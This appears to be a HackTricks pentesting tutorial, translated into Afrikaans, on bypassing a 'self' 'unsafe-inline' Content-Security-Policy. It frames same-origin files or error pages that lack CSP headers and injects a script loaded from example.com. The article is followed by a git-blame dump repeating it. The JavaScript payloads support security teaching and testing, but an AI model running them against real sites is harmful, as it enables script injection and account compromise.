hacktricks/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md

{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


'n Konfigurasie soos:
```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```
Prohibeer die gebruik van enige funksies wat kode uitvoer wat as 'n string oorgedra word. Byvoorbeeld: `eval, setTimeout, setInterval` sal almal geblokkeer word weens die instelling `unsafe-eval`

Enige inhoud van eksterne bronne word ook geblokkeer, insluitend beelde, CSS, WebSockets, en, veral, JS

### Via Tekst & Beelde

Dit word waargeneem dat moderne blaaiers beelde en teks in HTML omskakel om hul vertoning te verbeter (bv. agtergronde instel, sentreer, ens.). Gevolglik, as 'n beeld of tekslêer, soos `favicon.ico` of `robots.txt`, via 'n `iframe` geopen word, word dit as HTML gerender. Opmerklik is dat hierdie bladsye dikwels CSP-koptekste ontbreek en mag nie X-Frame-Options insluit nie, wat die uitvoering van arbitrêre JavaScript daaruit moontlik maak:
```javascript
frame=document.createElement("iframe");
frame.src="/css/bootstrap.min.css";
document.body.appendChild(frame);
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
### Via Foute

Net so, foutresponsies, soos tekslêers of beelde, kom tipies sonder CSP-koptekste en mag X-Frame-Options weglat. Foute kan veroorsaak word om binne 'n iframe te laai, wat die volgende aksies moontlik maak:
```javascript
// Inducing an nginx error
frame=document.createElement("iframe");
frame.src="/%2e%2e%2f";
document.body.appendChild(frame);

// Triggering an error with a long URL
frame=document.createElement("iframe");
frame.src="/"+"A".repeat(20000);
document.body.appendChild(frame);

// Generating an error via extensive cookies
for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
frame=document.createElement("iframe");
frame.src="/";
document.body.appendChild(frame);
// Removal of cookies is crucial post-execution
for(var i=0;i<5;i++){document.cookie=i+"="}
```
Na die aktivering van enige van die genoemde scenario's, is JavaScript-uitvoering binne die iframe haalbaar soos volg:
```javascript
script=document.createElement('script');
script.src='//example.com/csp.js';
window.frames[0].document.head.appendChild(script);
```
## Verwysings

* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)


{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Ondersteun HackTricks</summary>

* Kyk na die [**intekening planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Opleiding AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Opleiding GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`<summary>Ondersteun HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`* Kyk na die [subskripsie planne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`'n Konfigurasie soos:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```
a 2024-02-07 04:05:50 +00:00			`Content-Security-Policy: default-src 'self' 'unsafe-inline';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			Prohibeer die gebruik van enige funksies wat kode uitvoer wat as 'n string oorgedra word. Byvoorbeeld: `eval, setTimeout, setInterval` sal almal geblokkeer word weens die instelling `unsafe-eval`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`Enige inhoud van eksterne bronne word ook geblokkeer, insluitend beelde, CSS, WebSockets, en, veral, JS`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`### Via Tekst & Beelde`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			Dit word waargeneem dat moderne blaaiers beelde en teks in HTML omskakel om hul vertoning te verbeter (bv. agtergronde instel, sentreer, ens.). Gevolglik, as 'n beeld of tekslêer, soos `favicon.ico` of `robots.txt`, via 'n `iframe` geopen word, word dit as HTML gerender. Opmerklik is dat hierdie bladsye dikwels CSP-koptekste ontbreek en mag nie X-Frame-Options insluit nie, wat die uitvoering van arbitrêre JavaScript daaruit moontlik maak:
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
			`frame=document.createElement("iframe");`
			`frame.src="/css/bootstrap.min.css";`
			`document.body.appendChild(frame);`
			`script=document.createElement('script');`
a 2024-02-07 04:05:50 +00:00			`script.src='//example.com/csp.js';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`window.frames[0].document.head.appendChild(script);`
			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`### Via Foute`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`Net so, foutresponsies, soos tekslêers of beelde, kom tipies sonder CSP-koptekste en mag X-Frame-Options weglat. Foute kan veroorsaak word om binne 'n iframe te laai, wat die volgende aksies moontlik maak:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
a 2024-02-07 04:05:50 +00:00			`// Inducing an nginx error`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`frame=document.createElement("iframe");`
			`frame.src="/%2e%2e%2f";`
			`document.body.appendChild(frame);`

a 2024-02-07 04:05:50 +00:00			`// Triggering an error with a long URL`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`frame=document.createElement("iframe");`
			`frame.src="/"+"A".repeat(20000);`
			`document.body.appendChild(frame);`

a 2024-02-07 04:05:50 +00:00			`// Generating an error via extensive cookies`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};`
			`frame=document.createElement("iframe");`
			`frame.src="/";`
			`document.body.appendChild(frame);`
a 2024-02-07 04:05:50 +00:00			`// Removal of cookies is crucial post-execution`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`for(var i=0;i<5;i++){document.cookie=i+"="}`
			```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`Na die aktivering van enige van die genoemde scenario's, is JavaScript-uitvoering binne die iframe haalbaar soos volg:`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			```javascript
			`script=document.createElement('script');`
a 2024-02-07 04:05:50 +00:00			`script.src='//example.com/csp.js';`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00			`window.frames[0].document.head.appendChild(script);`
			```
Translated to Afrikaans 2024-02-11 02:07:06 +00:00			`## Verwysings`
GitBook: [#3108] No subject 2022-04-19 22:38:50 +00:00
			`* [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`{% hint style="success" %}`
			`Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Opleiding AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Opleiding GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`<summary>Ondersteun HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`* Kyk na die [intekening planne](https://github.com/sponsors/carlospolop)!`
			`* Sluit aan by die 💬 [Discord groep](https://discord.gg/hRep4RUj7f) of die [telegram groep](https://t.me/peass) of volg ons op Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Deel hacking truuks deur PRs in te dien na die [HackTricks](https://github.com/carlospolop/hacktricks) en [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['generic-methodologies-and-resources/basic-forensic-methodol 2024-07-19 10:16:39 +00:00			`{% endhint %}`